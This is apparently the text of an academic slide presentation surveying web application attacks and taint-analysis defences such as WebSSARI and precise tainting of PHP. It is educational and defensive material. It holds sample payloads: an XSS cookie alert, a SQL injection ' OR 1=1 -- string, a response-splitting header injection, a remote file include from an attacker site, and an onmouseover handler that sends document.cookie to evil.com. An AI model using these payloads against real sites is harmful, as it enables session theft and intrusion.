Vulnerability Analysis of Web-based Applications

Vulnerability Analysis of Web-based Applications Yi tang Email: tangyi@ymail.com Dec. 18/2008

Outline 1. Current web security trend 2. Web Technologies 3. Web based attacks 4. Vulnerability Analysis 5. Conclusion 2

web security  As web applications for critical services has increased, attacks against web has grown as well. A series of characteristics make it a valuable for an attacker.  web applications are often designed to be widely accessible  Web applications often interface with back-end component containing sensitive data  most popular web languages are currently easy enough to allow novices to start their own applications 3/50

Trend  In the first semester of 2005, Symantec cataloged 1,100 new vulnerabilities, which represent well over half of all new vulnerabilities, as affecting web-based applications.  A new statistic from white book of Symantec threaten report. 4/50

Outline 1. Current web security trend 2. Web technologies 3. Web based attacks 4. Vulnerability Analysis 5. Conclusion 5

Common Gateway Interface  One of the first mechanisms enabled dynamic content : Common Gateway Interface (CGI)  It defines a mechanism that a server can use to interact with external applications.  Disadvantage: requires to create a new process and executed for each request  Server-specific APIs:  Low initialization cost and can perform more general functionalities than CGI-based programs.  complex when writing a program, it involves some knowledge of the server’s inner workings. 6/50

users to authenticate tasks of parameter decoding and session manage 7/50

Embedded Web Application Frameworks  Today, most web application implementation is a middle way between original CGI and server specific APIs.  an interpreter or compiler used to encode the application’s components and define rules that govern the interaction between the server and the application’s components.  Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python. (interpreted, object-oriented, loosely typed) 8/50

A sample PHP program parameters of requests through HTTP GET method are available in the $ GET array native support for sessions, easy to keep track different requests users input are first checked using the validate function 9/50

Attacks  Web-based applications have fallen prey to a variety of different attacks that violate different security properties.  This survey focuses on attacks behave in unforeseen ways to disclose sensitive information or execute commands on behalf of the attacker.  Currently, most of attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation. 11/50

Interpreter Injection  Many dynamic languages include functions to dynamically compose and interpret code.  include and require - Includes and evaluates a file as PHP code.  eval, preg_replace - Evaluates a string as PHP code.  exec, passthru, system, popen, shell_exec, popen, pcntl_exec, proc_open and the backtick - Executes its input as a shell command.  Attack on the server 12/50

Sample of interpreter injection in Double Choco Latte url Server without fully filtering the parameter of menuAction 13/50

Filename Injection  Most languages of web are allowed to dynamically include files to interpret content or present them to users.  E.g. to generate different page content depending on user’s preferences, such as for internationalization purposes.  Because PHP allows for the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker’s control. 14/50

a filename injection vulnerability in txtForum  In txtForum, pages are divided in parts, e.g., header, footer, forum view, and can be customized by using different “skins,” which are different combination of colors, fonts, and other presentation parameters.  Skin with value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl 15/50

Script Cross-site attack （ （XSS））  In the attack, an attacker forces a client, typically a web browser, to execute attacker-supplied executable code, typically JavaScript code, which runs in the context of a trusted web site.  Sample: http://www.vulnerable.site/welcome.cgi?name=<script>alert (document.cookie)</script> 16/50

Impact of XSS-Attacks Access to authentication credentials for Web application  Cookies, Username and Password  XSS is not a harmless flaw !  Normal users  Access to personal data (Credit card, Bank Account)  Access to business data (Bid details, construction details)  Misuse account (order expensive goods)  High privileged users  Control over Web application  Control/Access: Web server machine  Control/Access: Backend / Database systems 17

SQL Injection  A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.  This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application. $activate = $_GET [" activate "]; $result = dbquery (" SELECT * FROM new_users " , " WHERE user_code =’ $activate ’"); where the activate parameter is set to the string ’ OR 1=1 -- the query will return the content of the entire new users table. SELECT * FROM new_users WHERE user_code =‘ ‘ OR 1=1 18/50

SQL Injection 19/50

Session Hijacking  HTTP is a stateless protocol, no built-in mechanism allows application to maintain state throughout a session.  The session state can be maintained in different ways.  It can be encoded in a document transmitted to the user in a way, such as cookie or HTML hidden form fields and sent back as part of later requests.  Problem: the cookie or hidden forms may be changed by dishonest users.  each user is assigned a unique session ID  Problem: Session fixation 20/50

Session Hijacking  Session fixation: the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. http://[target]/login.php?sessionid=1234 21/50

Response Splitting  the attacker is able to set the value of an HTTP header field, and the resulting response stream is interpreted by the attack target as two responses  To perform response splitting the attacker must be able to inject data containing the header termination characters and the beginning of a second header.  This is usually possible when user’s data is used (unsanitized) to determine the value of an HTTP header 22/50

Response Splitting <% response.sendRedirect (“/by_lang.jsp?lang =" + request. getParameter (" lang "));%> Location: http://vulnerable.com/by_lang.jsp?lang=en_US. However, if the lang= dummy%0d%0a Content-Length:%200 %0d%0a%0d%0a HTTP/1.1%20200%20OK%0d%0a Content-Type:%20text/html%0d%0a Content-Length:%2019%0d%0a%0d%0a <html>New document</html> 23/50

Response Splitting  Response Splitting often related to the attack of web cache poisoning  Two condition:  a caching proxy server interprets the response stream as containing two documents  associates the second one with the original request,  then an attacker would be able to insert in the cache of the proxy a page of his choice in association to a URL in the vulnerable application. 24/50

Vulnerability analysis  vulnerability analysis refers to the process of assessing the security of an application through auditing of either the application’s code or the behavior for possible security problems.  The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability based) approach and the positive (behavior based) approach. 26/50

Detection approach  Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications, to identify instances of the modeled vulnerabilities.  Positive approach: builds models of the normal behavior of an application (eg. using machine- learning techniques) and then analyze the application behavior to identify any abnormality that might be caused by a security violation.  Two fundamental analysis techniques that can be used to do the analysis : static analysis and dynamic analysis. 27/50

 Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. it does not require the application to be deployed and executed.  Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run-time. It is less prone to false positives, since the analysis is done on run-time.  In practice, hybrid approaches mixed both static and dynamic techniques, are frequently used to combine the strengths and minimize the limitations of the two approaches. 28/50

Outline 1. Current web security trend 2. Web Technologies 3. Web based attacks 4. Vulnerability Analysis 1. Negative approach 2. Positive approach 5. Conclusion 29

Negative approach: taint propagation  Most negative approaches assumes that vulnerabilities are the result of insecure data flow in applications.  We attempt to identify when untrusted user input propagates to security-critical functions(sinks) without being properly checked and sanitized.  taint propagation: data from input is marked as tainted and its propagation throughout the program is traced to check whether it can reach sinks. 30/50

Negative static Approaches  static analysis can be applied before the deployment. It does not require modification of the deployment environment.  Currently focus on the analysis of applications written in PHP and Java  It may require the source code of web site to do analysis. 31/50

WebSSARI (WWW’04)  WebSSARI (WWW’04) is one of the first works that applies taint propagation analysis in web security.  WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.  The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate.  Typestate: PHP is extended with two types: tainted and untainted, the tool keeps track the type-state of variables.  In order to untaint the tainted data, the data has to be processed by a sanitization routine or cast to a safe type. 32/50

 It predefine 3 file:  a file with preconditions to all sensitive functions (the sink)  a file with of known sanitization functions, for untaited.  a file specifying all possible sources of untrusted input  When the tool finds tainted data reaches sinks, it automatically inserts sanitization routines. 33/50

A X U T Y U T Z If (A) { A=X; } else { if (B) { A=Y; } else { A=Z; } } Echo (A); If (C) { If (A) Typestate At every program point, the algorithm keeps a static invariant representing the most dangerous possible state at that point. A=X; A T X T Y U Z T If (B) A U X Y T Z T A=Y; A=Z; A T U X T Y U Z T Echo (A) A T X T Y U Z T If (C) T=LUB(T,U,T) Control flow graph

Typestate If (A) { A=X; } else { if (B) { A=Y; } else { A=Z; } } Echo (A); If (C) { If (A) If (A) Typestate offers a balance between precision and cost Maintains a typestate for every diverging path – Increases precision – Induces memory cost Merges typestate at execution merge points – Limits memory cost – Induces imprecision – Denies counterexample support WebSSARI incorporates flow- sensitive typing based on typestate • • If (B) If (B) A=X; A=X; • A=Y; A=Z; A=Y; A=Z; • Echo (A) Echo (A) Control flow graph If (C) If (C)

Runtime Protection  Different sanitization routines are automatically inserted just before vulnerable function calls  Depending on the vulnerable function, one of the three following routines is inserted  HTML output sanitization  Database command sanitization  System command sanitization 36

System Implementation 37

Problem of WebSSARI:  Uses intra-procedural algorithm and thus only models information flow not cross function boundaries. (Xie Usenix 06)  All dynamic variables, arrays are considered tainted, reduce the accuracy of the analysis.  Can not accurately tracking arrays, alias and object-oriented code. (Pixy Oakland 06 ) 38/50

Summary  static analysis heavily depends on language specific parsers. It is not generally a problem for general purpose languages  Web applications use dynamic scripting languages to facilitate the use of complex data structures, such as arrays and hash, hard to track.  One main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecisions..  Precise evaluation of sanitization routines is more difficult. Just regular expression maybe not enough 39/50

Dynamic negative approach  Dynamic negative techniques is also based on taint analysis. Untrusted sources, sensitive sinks, and tainting propagates also need to be modeled  Instead of running analysis on source code, program or interpreter are extended to collect the information and the tainted data is tracked as execution.  Perl’s Taint mode: Perl interpreter is invoked with the –T option it makes sure that no data obtained from the outside environment can be used in security critical functions (too conservative) 40/50

“Automatically Hardening Web Applications Using Precise Tainting”, SEC’05  Propose modification of the PHP interpreter to dynamically track tainted data in PHP programs.  Fully automated  Aware of application semantics  Replace PHP interpreter with a modified interpreter that:  Keeps track of which information comes from untrusted sources (precise tainting)  Checks how untrusted input is used 41/50

file.php 2 3 File System 1 4 Client PHP Interpreter PHPrevent 8 5 HTTP Server Database 6 7 System APIs Web Server

Coarse Grain Tainting  Provided by many scripting languages (Perl, Ruby)  Untrusted input is tainted  Everything touched by tainted data becomes tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' "; Entire $query string is tainted

Precise Tainting • Untrusted input is tainted • Taint markings are maintained at character level – Depends on semantics of program • Only really tainted data is tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ";  $query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';'AND pwd = '' ";

Precise Checking  Wrappers around PHP functions that handle updating and checking precise taint information  Conservative: no false negatives while minimizing false positives  Behavior only changes when an attack is likely

Preventing SQL Injection  Parse the query using the SQL parser: identify interpreted text  Disallow SQL keywords or delimiters in interpreted text that is tainted  Query is not sent to database  Error response it returned "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";

Preventing PHP Injection  Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state  place wrappers around these functions to enforce this rule  phpBB attack prevented by wrappers around preg_replace

Preventing Cross Site Scripting  Wrappers around output functions  Buffer output and then parse the tainted output with HTML Tidy  Our defense takes advantage of precise tainting information to identify web page output generated from untrusted sources.  Dangerous content was determined by examining HTML grammar  Sanitize it by removing tags <b>Hello</b>  Safe <b onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b>  Unsafe

Summary of dynamic negative method  a modified interpreter can be applied to all web applications, all required information is available as execution result. Further, no complex analysis for features such as alias analysis is required.  However, no guarantees to all cases 49/50

Summary of negative method  If taint propagation is done statically, the precision highly depends on the ability of dealing the complexities of dynamic features. Precise evaluation of sanitization routines is especially important  If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability and performance arise. 50/50

Vulnerability Analysis of Web-based Applications

Vulnerability Analysis of Web-based Applications

Presentation Transcript